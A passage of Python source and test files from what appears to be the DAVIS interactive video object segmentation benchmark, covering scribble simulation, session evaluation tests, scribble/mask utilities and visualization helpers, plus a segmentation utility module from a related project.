empty_mask = np.zeros((100, 200), dtype=np.bool)
robot = InteractiveScribblesRobot()
out = robot._mask2graph(empty_mask)
assert out is None
def test_mask2graph(self):
empty_mask = np.zeros((100, 200), dtype=np.bool)
squared_mask = empty_mask.copy()
squared_mask[50:100, 100:150] = True
robot = InteractiveScribblesRobot()
out = robot._mask2graph(squared_mask)
assert isinstance(out, tuple)
assert len(out) == 2
G, T = out
assert isinstance(G, nx.Graph)
assert isinstance(T, np.ndarray)
assert T.dtype == np.int
assert len(G) == len(T)
T_x, T_y = T.T
assert T_x.min() >= 0
assert T_x.max() < 200
assert T_y.min() >= 0
assert T_y.max() < 100
def test_interaction_no_class(self):
gt_empty = np.zeros((10, 300, 500), dtype=np.int)
robot = InteractiveScribblesRobot()
with pytest.raises(ValueError):
robot.interact('test', gt_empty.copy(), gt_empty)
def test_interaction_equal(self):
nb_frames, h, w = 10, 300, 500
gt_empty = np.zeros((nb_frames, h, w), dtype=np.int)
gt_empty[0, 100:200, 100:200] = 1
pred_empty = gt_empty.copy()
robot = InteractiveScribblesRobot()
scribble = robot.interact('test', pred_empty, gt_empty)
assert is_empty(scribble)
assert annotated_frames(scribble) == []
assert len(scribble['scribbles']) == nb_frames
def test_interaction(self):
nb_frames, h, w = 10, 300, 500
gt_empty = np.zeros((nb_frames, h, w), dtype=np.int)
pred_empty = gt_empty.copy()
gt_empty[5, 100:200, 100:200] = 1
robot = InteractiveScribblesRobot()
scribble = robot.interact('test', pred_empty, gt_empty)
assert not is_empty(scribble)
assert annotated_frames(scribble) == [5]
assert len(scribble['scribbles']) == nb_frames
lines = scribble['scribbles'][5]
for l in lines:
assert l['object_id'] == 1
path = np.asarray(l['path'])
x, y = path[:, 0], path[:, 1]
assert np.all((x >= .2) & (x <= .4))
assert np.all((y >= 1 / 3) & (y <= 2 / 3))
def test_scribble_json_serializer(self):
nb_frames, h, w = 10, 300, 500
gt_empty = np.zeros((nb_frames, h, w), dtype=np.int)
pred_empty = gt_empty.copy()
gt_empty[5, 100:200, 100:200] = 1
robot = InteractiveScribblesRobot()
scribble = robot.interact('test', pred_empty, gt_empty)
json.JSONEncoder().encode(scribble)
def test_interaction_false_positive(self):
nb_frames, h, w = 10, 300, 500
gt_empty = np.zeros((nb_frames, h, w), dtype=np.int)
pred_empty = np.ones((nb_frames, h, w), dtype=np.int)
gt_empty[5, 100:200, 100:200] = 1
robot = InteractiveScribblesRobot()
scribble = robot.interact('test', pred_empty, gt_empty)
assert not is_empty(scribble)
assert annotated_frames(scribble) == [0]
assert len(scribble['scribbles']) == nb_frames
lines = scribble['scribbles'][0]
assert lines
for l in lines:
assert l['object_id'] == 0
path = np.asarray(l['path'])
x, y = path[:, 0], path[:, 1]
assert np.all((x >= 0) & (x <= 1))
assert np.all((y >= 0) & (y <= 1))
def test_interaction_false_positive_single_frame(self):
nb_frames, h, w = 1, 300, 500
gt_empty = np.zeros((nb_frames, h, w), dtype=np.int)
pred_empty = np.ones((nb_frames, h, w), dtype=np.int)
gt_empty[0, 100:200, 100:200] = 1
robot = InteractiveScribblesRobot()
scribble = robot.interact('test', pred_empty, gt_empty)
assert not is_empty(scribble)
assert annotated_frames(scribble) == [0]
assert len(scribble['scribbles']) == nb_frames
lines = scribble['scribbles'][0]
assert lines
for l in lines:
assert l['object_id'] == 0
path = np.asarray(l['path'])
x, y = path[:, 0], path[:, 1]
inside = (x >= .2) & (x <= .4) & (y >= 1 / 3) & (y <= 2 / 3)
assert not np.any(inside)
```
#### File: davisinteractive/session/session_test.py
```python
from __future__ import absolute_import, division
import json
import os
import tempfile
import time
import unittest
from functools import wraps
import numpy as np
import pandas as pd
import pytest
from davisinteractive.common import Path, patch
from davisinteractive.connector.local import LocalConnector
from davisinteractive.dataset import Davis
from davisinteractive.session import DavisInteractiveSession
from davisinteractive.utils.scribbles import annotated_frames, is_empty
EMPTY_SCRIBBLE = {
'scribbles': [[] for _ in range(69)],
'sequence': 'test-sequence'
}
def dataset(subset, **samples):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
sequence_set = Davis.sets[subset]
new_set = list(samples.keys())
            new_set.sort() # Necessary as the key order is not guaranteed
original = Davis.dataset.copy()
for seq in samples:
Davis.dataset[seq].update(samples[seq])
Davis.sets[subset] = new_set
result = func(*args, **kwargs)
            # Recover the original state of the Davis class
Davis.sets[subset] = sequence_set
Davis.dataset = original
return result
return wrapper
return decorator
class TestDavisInteractiveSession(unittest.TestCase):
@patch.object(Davis, 'check_files', return_value=None)
def test_subset(self, mock_davis):
davis_root = '/tmp/DAVIS'
session = DavisInteractiveSession(subset='val', davis_root=davis_root)
session.__enter__()
session = DavisInteractiveSession(subset='train', davis_root=davis_root)
session.__enter__()
session1 = DavisInteractiveSession(
subset='test-dev', davis_root=davis_root)
session2 = DavisInteractiveSession(subset='xxxx', davis_root=davis_root)
with pytest.raises(ValueError):
session1.__enter__()
with pytest.raises(ValueError):
session2.__enter__()
assert mock_davis.call_count == 2
@patch.object(
LocalConnector, 'post_predicted_masks', return_value=EMPTY_SCRIBBLE)
@patch.object(LocalConnector, 'get_report', return_value=pd.DataFrame())
@patch.object(LocalConnector, 'get_scribble', return_value=EMPTY_SCRIBBLE)
@patch.object(
LocalConnector,
'get_samples',
return_value=([('bear', 2), ('bear', 1)], 5, None))
def test_interactions_limit(self, mock_start_session, mock_get_scribble,
mock_get_report, mock_submit_masks):
davis_root = '/tmp/DAVIS'
with DavisInteractiveSession(
davis_root=davis_root,
max_nb_interactions=5,
report_save_dir=tempfile.mkdtemp(),
max_time=None) as session:
assert mock_start_session.call_count == 1
for i in range(7):
assert session.next()
seq, scribbles, new_seq = session.get_scribbles()
assert seq == 'bear'
assert is_empty(scribbles)
if i % 5 == 0:
assert new_seq, i
session.submit_masks(None)
assert mock_get_scribble.call_count == 2
assert mock_submit_masks.call_count == 7
@dataset('train', bear={'num_frames': 2, 'num_scribbles': 1})
@patch.object(Davis, '_download_scribbles', return_value=None)
def test_integration_single(self, mock_davis):
dataset_dir = Path(__file__).parent.joinpath('test_data', 'DAVIS')
tmp_dir = Path(tempfile.mkdtemp())
with DavisInteractiveSession(
davis_root=dataset_dir,
subset='train',
max_nb_interactions=5,
report_save_dir=tmp_dir,
max_time=None) as session:
count = 0
temp_csv = tmp_dir / ("%s.tmp.csv" % session.report_name)
final_csv = tmp_dir / ("%s.csv" % session.report_name)
while session.next():
assert not final_csv.exists()
assert temp_csv.exists()
df = pd.read_csv(temp_csv, index_col=0)
assert df.shape == (count * 2, 10)
seq, scribble, new_seq = session.get_scribbles(only_last=True)
assert new_seq == (count == 0)
assert seq == 'bear'
if count == 0:
with dataset_dir.joinpath('Scribbles', 'bear',
'001.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
else:
assert annotated_frames(scribble) == [1]
assert not is_empty(scribble)
assert len(scribble['scribbles']) == 2
assert len(scribble['scribbles'][1]) > 0
assert len(scribble['scribbles'][0]) == 0
# Simulate model predicting masks
pred_masks = np.zeros((2, 480, 854))
session.submit_masks(
pred_masks, next_scribble_frame_candidates=[1])
if count > 0:
assert df.sequence.unique() == ['bear']
assert np.all(df.interaction.unique() ==
[i + 1 for i in range(count)])
assert np.all(df.object_id.unique() == [1])
count += 1
assert count == 5
assert final_csv.exists()
assert not temp_csv.exists()
assert mock_davis.call_count == 0
@dataset('train', bear={'num_frames': 2, 'num_scribbles': 2})
@patch.object(Davis, '_download_scribbles', return_value=None)
def test_integration_multiple(self, mock_davis):
dataset_dir = Path(__file__).parent.joinpath('test_data', 'DAVIS')
with DavisInteractiveSession(
davis_root=dataset_dir,
subset='train',
max_nb_interactions=5,
report_save_dir=tempfile.mkdtemp(),
max_time=None) as session:
count = 0
while session.next():
seq, scribble, new_seq = session.get_scribbles()
assert new_seq == (count == 0 or count == 5)
assert seq == 'bear'
if count == 0:
with dataset_dir.joinpath('Scribbles', 'bear',
'001.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
if count == 5:
with dataset_dir.joinpath('Scribbles', 'bear',
'002.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
assert not is_empty(scribble)
# Simulate model predicting masks
pred_masks = np.zeros((2, 480, 854))
session.submit_masks(pred_masks)
count += 1
assert count == 10
assert mock_davis.call_count == 0
@dataset(
'train',
bear={
'num_frames': 2,
'num_scribbles': 2
},
tennis={
'num_frames': 2,
'num_scribbles': 1
})
@patch.object(Davis, '_download_scribbles', return_value=None)
def test_integration_multiple_sequences(self, mock_davis):
dataset_dir = Path(__file__).parent.joinpath('test_data', 'DAVIS')
with DavisInteractiveSession(
davis_root=dataset_dir,
subset='train',
max_nb_interactions=4,
report_save_dir=tempfile.mkdtemp(),
max_time=None) as session:
count = 0
for seq, scribble, new_seq in session.scribbles_iterator():
assert new_seq == (count == 0 or count == 4 or count == 8)
if count < 8:
assert seq == 'bear', count
else:
assert seq == 'tennis', count
if count == 0:
with dataset_dir.joinpath('Scribbles', 'bear',
'001.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
if count == 4:
with dataset_dir.joinpath('Scribbles', 'bear',
'002.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
if count == 8:
with dataset_dir.joinpath('Scribbles', 'tennis',
'001.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
assert not is_empty(scribble)
# Simulate model predicting masks
pred_masks = np.ones((2, 480, 854))
session.submit_masks(pred_masks)
count += 1
assert count == 12
df = session.get_report()
assert mock_davis.call_count == 0
assert df.shape == (2 * 4 * 2 * 1 + 4 * 2 * 2, 10)
global_summary_file = os.path.join(tempfile.mkdtemp(), 'summary.json')
summary = session.get_global_summary()
self.assertFalse(os.path.exists(global_summary_file))
self.assertTrue('auc' in summary)
self.assertTrue('metric_at_threshold' in summary)
self.assertEqual(summary['metric_at_threshold']['threshold'], 60)
np.testing.assert_almost_equal(summary['metric_at_threshold']['J_AND_F'],
0.035155)
self.assertTrue('curve' in summary)
curve = summary['curve']
self.assertEqual(len(curve['J_AND_F']), 6)
self.assertEqual(len(curve['time']), 6)
summary = session.get_global_summary(save_file=global_summary_file)
self.assertTrue(os.path.exists(global_summary_file))
@dataset(
'train',
bear={
'num_frames': 2,
'num_scribbles': 2
},
tennis={
'num_frames': 2,
'num_scribbles': 1
})
@patch.object(Davis, '_download_scribbles', return_value=None)
def test_integration_multiple_sequences_metric(self, mock_davis):
dataset_dir = Path(__file__).parent.joinpath('test_data', 'DAVIS')
with DavisInteractiveSession(
davis_root=dataset_dir,
subset='train',
max_nb_interactions=4,
report_save_dir=tempfile.mkdtemp(),
metric_to_optimize='J',
max_time=None) as session:
count = 0
for seq, scribble, new_seq in session.scribbles_iterator():
assert new_seq == (count == 0 or count == 4 or count == 8)
if count < 8:
assert seq == 'bear', count
else:
assert seq == 'tennis', count
if count == 0:
with dataset_dir.joinpath('Scribbles', 'bear',
'001.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
if count == 4:
with dataset_dir.joinpath('Scribbles', 'bear',
'002.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
if count == 8:
with dataset_dir.joinpath('Scribbles', 'tennis',
'001.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
assert not is_empty(scribble)
# Simulate model predicting masks
pred_masks = np.ones((2, 480, 854))
session.submit_masks(pred_masks)
count += 1
assert count == 12
df = session.get_report()
assert mock_davis.call_count == 0
assert df.shape == (2 * 4 * 2 * 1 + 4 * 2 * 2, 10)
global_summary_file = os.path.join(tempfile.mkdtemp(), 'summary.json')
summary = session.get_global_summary()
self.assertFalse(os.path.exists(global_summary_file))
self.assertTrue('auc' in summary)
self.assertTrue('metric_at_threshold' in summary)
self.assertEqual(summary['metric_at_threshold']['threshold'], 60)
np.testing.assert_almost_equal(summary['metric_at_threshold']['J'],
0.07031)
self.assertTrue('curve' in summary)
curve = summary['curve']
self.assertEqual(len(curve['J']), 6)
self.assertEqual(len(curve['time']), 6)
summary = session.get_global_summary(save_file=global_summary_file)
self.assertTrue(os.path.exists(global_summary_file))
@dataset('train', blackswan={'num_frames': 6, 'num_scribbles': 1})
@patch.object(Davis, '_download_scribbles', return_value=None)
def test_integration_single_only_last(self, mock_davis):
dataset_dir = Path(__file__).parent.joinpath('test_data', 'DAVIS')
with DavisInteractiveSession(
davis_root=dataset_dir,
subset='train',
max_nb_interactions=4,
report_save_dir=tempfile.mkdtemp(),
max_time=None) as session:
count = 0
annotated_frames_list = []
while session.next():
seq, scribble, new_seq = session.get_scribbles(only_last=True)
assert new_seq == (count == 0)
assert seq == 'blackswan'
if count == 0:
with dataset_dir.joinpath('Scribbles', 'blackswan',
'001.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
else:
assert len(annotated_frames(scribble)) == 1
a_fr = annotated_frames(scribble)[0]
assert a_fr not in annotated_frames_list
annotated_frames_list.append(a_fr)
assert not is_empty(scribble)
# Simulate model predicting masks
pred_masks = np.zeros((6, 480, 854))
session.submit_masks(pred_masks)
count += 1
assert count == 4
assert mock_davis.call_count == 0
@dataset('train', bear={'num_frames': 2, 'num_scribbles': 1})
@patch.object(Davis, '_download_scribbles', return_value=None)
def test_integration_single_timeout(self, mock_davis):
dataset_dir = Path(__file__).parent.joinpath('test_data', 'DAVIS')
with DavisInteractiveSession(
davis_root=dataset_dir,
subset='train',
max_nb_interactions=None,
max_time=1,
report_save_dir=tempfile.mkdtemp()) as session:
count = 0
while session.next():
seq, scribble, new_seq = session.get_scribbles(only_last=True)
assert new_seq == (count == 0)
assert seq == 'bear'
with dataset_dir.joinpath('Scribbles', 'bear',
'001.json').open() as fp:
sc = json.load(fp)
assert sc == scribble
assert not is_empty(scribble)
# Simulate model predicting masks
pred_masks = np.zeros((2, 480, 854))
time.sleep(1.2)
session.submit_masks(pred_masks)
count += 1
assert count == 1
assert mock_davis.call_count == 0
@dataset('train', bear={'num_frames': 2, 'num_scribbles': 1})
@patch.object(Davis, '_download_scribbles', return_value=None)
def test_report_folder_creation(self, mock_davis):
dataset_dir = Path(__file__).parent.joinpath('test_data', 'DAVIS')
tmp_dir = Path(tempfile.mkdtemp()) / 'test'
assert not tmp_dir.exists()
session = DavisInteractiveSession(
davis_root=dataset_dir, subset='train', report_save_dir=tmp_dir)
assert tmp_dir.exists()
assert mock_davis.call_count == 0
@dataset(
'train',
bear={
'num_frames': 2,
'num_scribbles': 2
},
tennis={
'num_frames': 2,
'num_scribbles': 1
})
@patch.object(Davis, '_download_scribbles', return_value=None)
def test_shuffle(self, mock_davis):
dataset_dir = Path(__file__).parent.joinpath('test_data', 'DAVIS')
with DavisInteractiveSession(
davis_root=dataset_dir,
subset='train',
shuffle=True,
report_save_dir=tempfile.mkdtemp()) as session:
assert ('bear', 1) in session.samples
assert ('bear', 2) in session.samples
assert ('tennis', 1) in session.samples
assert mock_davis.call_count == 0
```
#### File: davisinteractive/storage/local_test.py
```python
import unittest
import numpy as np
import pytest
from davisinteractive.storage import LocalStorage
class TestLocalStorage(unittest.TestCase):
def test_init(self):
storage = LocalStorage()
for c in storage.COLUMNS:
assert c in storage.report
def test_store_operation(self):
user_id = 'empty'
session_id = '12345'
sequence = 'test'
scribble_idx = 1
interaction = 1
timing = 10.34
objects_idx = [1, 2, 3]
frames = [0, 0, 0]
jaccard = [.2, .3, .4]
contour = [.8, .6, .4]
storage = LocalStorage()
with pytest.raises(ValueError):
storage.store_interactions_results(
user_id, session_id, sequence, scribble_idx, interaction,
timing, objects_idx, frames, [.1, .2, 1.0001], contour)
with pytest.raises(ValueError):
storage.store_interactions_results(
user_id, session_id, sequence, scribble_idx, interaction,
timing, objects_idx, frames, [-.1, .2, 1], contour)
with pytest.raises(ValueError):
storage.store_interactions_results(
user_id, session_id, sequence, scribble_idx, interaction,
timing, objects_idx, [1, 1], jaccard, contour)
with pytest.raises(ValueError):
storage.store_interactions_results(
user_id, session_id, sequence, scribble_idx, interaction,
timing, objects_idx, frames, jaccard, [-0.01, 1.0, .4])
assert storage.store_interactions_results(
user_id, session_id, sequence, scribble_idx, interaction, timing,
objects_idx, frames, [.1, .000, 1.000], contour)
with pytest.raises(RuntimeError):
storage.store_interactions_results(
user_id, session_id, sequence, scribble_idx, interaction,
timing, objects_idx, frames, jaccard, contour)
with pytest.raises(RuntimeError):
storage.store_interactions_results(
user_id, session_id, sequence, scribble_idx, interaction + 2,
timing, objects_idx, frames, jaccard, contour)
assert storage.store_interactions_results(
user_id, session_id, sequence, scribble_idx, interaction + 1,
timing, objects_idx, frames, jaccard, contour)
def test_annotated_frames(self):
session_id = 'unused'
sequence = 'bmx-trees'
scribble_idx = 1
storage = LocalStorage()
storage.store_annotated_frame(session_id, sequence, scribble_idx, 1,
False)
annotated_frames = storage.get_annotated_frames(session_id, sequence,
scribble_idx)
self.assertEqual(annotated_frames, (1,))
def test_annotated_frames_full(self):
session_id = 'unused'
sequence = 'bmx-trees'
scribble_idx = 1
nb_frames = 80
storage = LocalStorage()
for i in range(nb_frames):
storage.store_annotated_frame(session_id, sequence, scribble_idx, i,
False)
annotated_frames = storage.get_annotated_frames(session_id, sequence,
scribble_idx)
self.assertEqual(annotated_frames, tuple())
```
#### File: davisinteractive/utils/scribbles.py
```python
from __future__ import absolute_import, division
import numpy as np
from .operations import bezier_curve
from .operations import bresenham as bresenham_function
def scribbles2mask(scribbles,
output_resolution,
bezier_curve_sampling=False,
nb_points=1000,
bresenham=True,
default_value=-1):
""" Convert the scribbles data into a mask.
# Arguments
scribbles: Dictionary. Scribbles in the default format.
output_resolution: Tuple. Output resolution (H, W).
        bezier_curve_sampling: Boolean. Whether to first sample the returned
scribbles using bezier curve or not.
nb_points: Integer. If `bezier_curve_sampling` is `True` set the number
of points to sample from the bezier curve.
bresenham: Boolean. Whether to compute bresenham algorithm for the
scribbles lines.
default_value: Integer. Default value for the pixels which do not belong
to any scribble.
# Returns
ndarray: Array with the mask of the scribbles with the index of the
            object ids. The shape of the returned array is (B x H x W), with B
            being the number of frames in the scribble.
"""
if len(output_resolution) != 2:
raise ValueError(
'Invalid output resolution: {}'.format(output_resolution))
for r in output_resolution:
if r < 1:
raise ValueError(
'Invalid output resolution: {}'.format(output_resolution))
nb_frames = len(scribbles['scribbles'])
masks = np.full(
(nb_frames,) + output_resolution, default_value, dtype=np.int)
size_array = np.asarray(output_resolution[::-1], dtype=np.float) - 1
for f in range(nb_frames):
sp = scribbles['scribbles'][f]
for p in sp:
path = p['path']
obj_id = p['object_id']
path = np.asarray(path, dtype=np.float)
if bezier_curve_sampling:
path = bezier_curve(path, nb_points=nb_points)
path *= size_array
path = path.astype(np.int)
if bresenham:
path = bresenham_function(path)
m = masks[f]
m[path[:, 1], path[:, 0]] = obj_id
masks[f] = m
return masks
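# Usage sketch (a minimal scribble dict in the default format; values are illustrative):
#   scribbles = {'sequence': 'bear',
#                'scribbles': [[{'path': [[0.1, 0.1], [0.5, 0.5]], 'object_id': 1}], []]}
#   masks = scribbles2mask(scribbles, output_resolution=(480, 854))
#   # masks.shape == (2, 480, 854); pixels on the rasterized line hold 1, the rest -1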
def scribbles2points(scribbles_data, output_resolution=None):
""" Convert the given scribbles into a list of points and object ids.
# Arguments
scribbles_data: Dictionary. Scribbles in the default format
output_resolution: Tuple. Output resolution (H, W) to scale the
points.
            If None is given, the points will be floats as a fraction of height
and width.
# Returns
(ndarray, ndarray): Returns (X, Y) where X is a list of points from the
scribbles represented in the output_resolution with shape (N x 3)
with N being the total number of points on all the scribbles. The three
        coordinates given correspond to the frame number, height and width,
respectively.
Y is the object id for each given point with shape (N,).
"""
scribbles = scribbles_data['scribbles']
paths, object_ids = [], []
for frame, s in enumerate(scribbles):
for l in s:
# p = l['path']
coordinates = [[frame] + point for point in l['path']]
paths += coordinates
object_ids += [l['object_id']] * len(l['path'])
paths = np.asarray(paths, dtype=np.float)
object_ids = np.asarray(object_ids, dtype=np.int)
if output_resolution:
h, w = output_resolution
img_size = np.asarray([1, h - 1, w - 1], dtype=np.float)
paths *= img_size
paths = paths.astype(np.int)
return paths, object_ids
def fuse_scribbles(scribbles_a, scribbles_b):
""" Fuse two scribbles in the default format.
# Arguments
scribbles_a: Dictionary. Default representation of scribbles A.
scribbles_b: Dictionary. Default representation of scribbles B.
# Returns
dict: Returns a dictionary with scribbles A and B fused.
"""
if scribbles_a['sequence'] != scribbles_b['sequence']:
raise ValueError('Scribbles to fuse are not from the same sequence')
if len(scribbles_a['scribbles']) != len(scribbles_b['scribbles']):
raise ValueError('Scribbles does not have the same number of frames')
scribbles = dict(scribbles_a)
nb_frames = len(scribbles['scribbles'])
for i in range(nb_frames):
scribbles['scribbles'][i] += scribbles_b['scribbles'][i]
return scribbles
def is_empty(scribbles_data):
""" Checks whether the given scribble has any non-empty line.
# Arguments
scribbles_data (dict): Scribble in the default format
# Returns
bool: Whether the scribble is empty or not.
"""
scribbles = scribbles_data['scribbles']
has_lines = [len(s) > 0 for s in scribbles]
return not any(has_lines)
def annotated_frames(scribbles_data):
""" Finds which frames have a scribble.
# Arguments
scribbles_data (dict): Scribble in the default format.
# Returns
list: Number of the frames that contain at least one scribble.
"""
scribbles = scribbles_data['scribbles']
frames_list = [i for i, s in enumerate(scribbles) if s]
return frames_list
def annotated_frames_object(scribbles_data, object_id):
""" Computes which frames have a scribble for a certain object.
# Arguments
scribbles_data (dict): Scribble in the default format.
object_id (int): Id of the object of interest.
# Returns
        list: Frame numbers that contain at least one scribble for the given object.
"""
frames_list = []
scribbles = scribbles_data['scribbles']
for ii, scribble_frame in enumerate(scribbles):
for scribble in scribble_frame:
if scribble['object_id'] == object_id:
frames_list.append(ii)
break
return frames_list
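# Quick illustration of the helpers above (values are illustrative):
#   data = {'sequence': 'bear',
#           'scribbles': [[], [{'path': [[0.2, 0.3]], 'object_id': 1}], []]}
#   is_empty(data)                    -> False
#   annotated_frames(data)            -> [1]
#   annotated_frames_object(data, 1)  -> [1]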
```
#### File: davisinteractive/utils/visualization.py
```python
from __future__ import absolute_import, division
import numpy as np
from PIL import ImageDraw
def _pascal_color_map(N=256, normalized=False):
"""
Python implementation of the color map function for the PASCAL VOC data set.
Official Matlab version can be found in the PASCAL VOC devkit
http://host.robots.ox.ac.uk/pascal/VOC/voc2012/index.html#devkit
"""
def bitget(byteval, idx):
return (byteval & (1 << idx)) != 0
dtype = 'float32' if normalized else 'uint8'
cmap = np.zeros((N, 3), dtype=dtype)
for i in range(N):
r = g = b = 0
c = i
for j in range(8):
r = r | (bitget(c, 0) << 7 - j)
g = g | (bitget(c, 1) << 7 - j)
b = b | (bitget(c, 2) << 7 - j)
c = c >> 3
cmap[i] = np.array([r, g, b])
cmap = cmap / 255 if normalized else cmap
return cmap
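# For reference, the first entries of the PASCAL VOC colormap are
# 0: (0, 0, 0), 1: (128, 0, 0), 2: (0, 128, 0), 3: (128, 128, 0), 4: (0, 0, 128),
# so object id 1 is drawn in dark red, id 2 in dark green, and so on.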
def plot_scribble(ax, scribble, frame, output_size=None, **kwargs):
""" Plot scribbles into an axis.
# Arguments
ax: Matplotlib Axis. Axis where to plot the scribble lines.
scribbles: Scribble. Scribble to plot.
frame: Integer. Frame of the scribble to plot.
output_size: Tuple. Image size to scale the scribble points `(H, W)`.
**kwargs: Dictionary. Additional parameters to pass at the
`ax.plot(**kwargs)` method.
# Returns
matplotlib.axis: Returns the given axis with the scribbles plotted on
it.
"""
scribbles = scribble['scribbles']
if frame >= len(scribbles):
raise ValueError('Frame value not valid')
cmap = _pascal_color_map(normalized=True)
frame_scribbles = scribbles[frame]
for line in frame_scribbles:
path, obj_id = line['path'], line['object_id']
path = np.asarray(path, dtype=np.float32)
color = cmap[obj_id]
if output_size:
img_size = np.asarray(output_size, dtype=np.float32)
img_size -= 1
path *= img_size
ax.plot(*path.T, color=color, **kwargs)
return ax
def draw_scribble(img, scribble, frame, output_size=None, width=5):
""" Draw scribbles into a PIL Image.
# Arguments
img: PIL Image. Image where to draw the scribbles.
scribbles: Scribble. Scribble to plot.
frame: Integer. Frame of the scribble to plot.
output_size: Tuple. Image size to scale the scribble points `(H, W)`.
        width: Integer. Width of the drawn lines.
# Returns
PIL Image: Returns the original image `img` with the scribble draw on
it.
"""
scribbles = scribble['scribbles']
if frame >= len(scribbles):
raise ValueError('Frame value not valid')
cmap = _pascal_color_map(normalized=False)
frame_scribbles = scribbles[frame]
draw = ImageDraw.Draw(img)
for line in frame_scribbles:
path, obj_id = line['path'], line['object_id']
path = np.asarray(path, dtype=np.float32)
color = cmap[obj_id]
if output_size:
img_size = np.asarray(output_size, dtype=np.float32)
img_size -= 1
path *= img_size
path = path.ravel().tolist()
draw.line(path, fill=tuple(color), width=width)
del draw
return img
def overlay_mask(im, ann, alpha=0.5, colors=None, contour_thickness=None):
""" Overlay mask over image.
This function allows you to overlay a mask over an image with some
transparency.
# Arguments
im: Numpy Array. Array with the image. The shape must be (H, W, 3) and
the pixels must be represented as `np.uint8` data type.
ann: Numpy Array. Array with the mask. The shape must be (H, W) and the
            values must be integers
alpha: Float. Proportion of alpha to apply at the overlaid mask.
colors: Numpy Array. Optional custom colormap. It must have shape (N, 3)
being N the maximum number of colors to represent.
        contour_thickness: Integer. Thickness of each object index contour drawn
over the overlay. This function requires to have installed the
package `opencv-python`.
# Returns
Numpy Array: Image of the overlay with shape (H, W, 3) and data type
`np.uint8`.
"""
im, ann = np.asarray(im, dtype=np.uint8), np.asarray(ann, dtype=np.int)
if im.shape[:-1] != ann.shape:
raise ValueError('First two dimensions of `im` and `ann` must match')
if im.shape[-1] != 3:
raise ValueError('im must have three channels at the 3 dimension')
colors = colors or _pascal_color_map()
colors = np.asarray(colors, dtype=np.uint8)
mask = colors[ann]
fg = im * alpha + (1 - alpha) * mask
img = im.copy()
img[ann > 0] = fg[ann > 0]
if contour_thickness: # pragma: no cover
import cv2
for obj_id in np.unique(ann[ann > 0]):
contours = cv2.findContours((ann == obj_id).astype(
np.uint8), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)[-2:]
cv2.drawContours(img, contours[0], -1, colors[obj_id].tolist(),
contour_thickness)
return img
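# Usage sketch (assumes an RGB uint8 image and an integer mask of the same H x W):
#   im = np.zeros((480, 854, 3), dtype=np.uint8)
#   ann = np.zeros((480, 854), dtype=np.int)
#   ann[100:200, 100:200] = 1
#   out = overlay_mask(im, ann, alpha=0.5)   # (480, 854, 3) uint8, object 1 tinted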
```
#### File: zisan/Seg/utils.py
```python
from __future__ import division
import torch
from torch.autograd import Variable
from torch.utils import data
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.init as init
import torch.utils.model_zoo as model_zoo
from torchvision import models
# general libs
import matplotlib.pyplot as plt
from PIL import Image, ImageDraw, ImageFont
import numpy as np
import os
import copy
import cv2
import random
import glob
def ToCudaVariable(xs, volatile=False, requires_grad=False):
if torch.cuda.is_available():
return [Variable(x.cuda(), volatile=volatile, requires_grad=requires_grad) for x in xs]
else:
return [Variable(x, volatile=volatile, requires_grad=requires_grad) for x in xs]
def ToCudaPN(mask):
P = (mask == 1).astype(np.float32)
N = (mask == 0).astype(np.float32)
P = torch.unsqueeze(torch.from_numpy(P), dim=0).float()
N = torch.unsqueeze(torch.from_numpy(N), dim=0).float()
return ToCudaVariable([P, N], volatile=True)
def Get_weight(target, prev_targets, num_frames, at_least=-1):
right_end = min(filter(lambda x: x > target, prev_targets+[9999]))
if right_end == 9999:
NO_R_END = True
right_end = num_frames-1
else:
NO_R_END = False
left_end = max(filter(lambda x: x < target, prev_targets+[-9999]))
if left_end == -9999:
NO_L_END = True
left_end = 0
else:
NO_L_END = False
weight = num_frames*[1.0]
if (right_end - target) < at_least:
right_end = min(target + at_least, num_frames-1)
if (target - left_end) < at_least:
left_end = max(target - at_least, 0)
if NO_R_END: # no right end
pass # set 1.0
else:
step = 1.0 / (right_end - target)
for n,f in enumerate(range(target+1, num_frames)):
weight[f] = max(0.0, 1.0 - (n+1)*step)
if NO_L_END: # no left end
pass # set 1.0
else:
step = 1.0 / (target - left_end)
for n, f in enumerate(reversed(range(0, target))):
weight[f] = max(0.0, 1.0 - (n+1)*step)
return left_end, right_end, weight
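# Worked example (illustrative): Get_weight(target=4, prev_targets=[0, 8], num_frames=10)
# returns (0, 8, weight), where the per-frame weights ramp linearly from the previously
# annotated frames up to 1.0 at the target frame:
#   [0.0, 0.25, 0.5, 0.75, 1.0, 0.75, 0.5, 0.25, 0.0, 0.0]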
def To_np_label(all_E, K, index):
# assume numpy input E: 1,o,t,h,w -> t,h,w
sh_E = all_E[0].data.cpu().numpy()
inv_index = [index.index(i) for i in range(K)]
E = sh_E[inv_index]
fgs = np.argmax(E, axis=0)
return fgs.astype(np.uint8)
def load_frames(path, size=None, num_frames=None):
fnames = glob.glob(os.path.join(path, '*.jpg'))
fnames.sort()
frame_list = []
for i, fname in enumerate(fnames):
if size:
frame_list.append(np.array(Image.open(fname).convert('RGB').resize((size[0], size[1]), Image.BICUBIC), dtype=np.uint8))
else:
frame_list.append(np.array(Image.open(fname).convert('RGB'), dtype=np.uint8))
if num_frames and i > num_frames:
break
frames = np.stack(frame_list, axis=0)
return frames
def load_UnDP(path):
# load a DataParallel-wrapped checkpoint properly
state_dict = torch.load(path, map_location='cpu')
# create a new OrderedDict that does not contain the `module.` prefix
from collections import OrderedDict
new_state_dict = OrderedDict()
for k, v in state_dict.items():
name = k[7:] # remove `module.`
new_state_dict[name] = v
return new_state_dict
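# Usage sketch (the model class and checkpoint path are hypothetical):
#   model = MyNet()
#   model.load_state_dict(load_UnDP('weights/checkpoint.pth'))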
def overlay_davis(image,mask,rgb=[255,0,0],cscale=2,alpha=0.5):
""" Overlay segmentation on top of RGB image. from davis official"""
# import skimage
from scipy.ndimage.morphology import binary_erosion, binary_dilation
im_overlay = image.copy()
